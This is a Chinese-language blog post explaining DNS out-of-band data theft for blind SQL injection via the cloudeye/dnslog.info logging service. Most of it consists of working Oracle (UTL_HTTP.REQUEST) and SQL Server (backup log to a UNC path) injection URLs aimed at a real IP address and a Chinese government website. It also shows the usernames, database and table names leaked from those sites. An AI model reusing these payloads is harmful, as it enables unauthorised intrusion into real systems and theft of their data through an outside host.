dns带外查询（cloudeye.me的使用）

一些操蛋盲注可以用dns的带外查询来解决了，而且有了cloudeye这个神器就可以愉快的解决：

说明：
我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址，然后我们才会发起对那台服务的请求，cloudeye留下了四级五级域名的控制权，所以我们能发起一个域名请求来在cloudeye留下日志信息，从将数据库的信息带出来

比如：ping test.xxxxx.dnslog.info

你就会看到在日志记录上留下痕迹：
test.xxxxx.dnslog.info


我们如果用数据库发起一个dns请求： (数据库查询结果).xxxx.dnslog.info

就会在cloudeye的日志里面留下
(数据库查询结果).xxxx.dnslog.info

注意：
dns的请求被限制在63个字符长度大小
oracle的利用方式：
（1）首先是获取数据库的当前用户的用户名：

http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)||'.xxxxx.dnslog.info') FROM DUAL) –

说明：我看了帖子终于找到一个靠谱的函数：
UTL_HTTP.REQUEST():
utl_http包功能还是很强大的 可以通过他来捕捉网站页面的内容 或者调用一个url的接口完成某项功能

这里我们来用他引发dns 查询

在cloudeye的日志中留下的：nchd.xxxxx.dnslog.info

其中：nchd 就是数据库的当前用户名

（2）查询表名：
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)||'.xxxxx.dnslog.info') FROM DUAL) –

结果：

dr$qk_comcp_fulltext$k.xxxxx.dnslog.info

表名是：dr$qk_comcp_fulltext$k

sql server的利用方式：

获取数据库名：

www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select db_name());exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxxx.dnslog.info\a'';');--


结果：

kaifeng.xxxxx.dnslog.info

数据库名字：kaifeng

爆表：
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0);exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxx.dnslog.info\a'';');--

结果：

FRIENDLINK.xxxxx.dnslog.info

表名：FRIENDLINK

对了，cloudeye可以在乌云官网上购买：

http://www.wooyun.org/market/260

10wb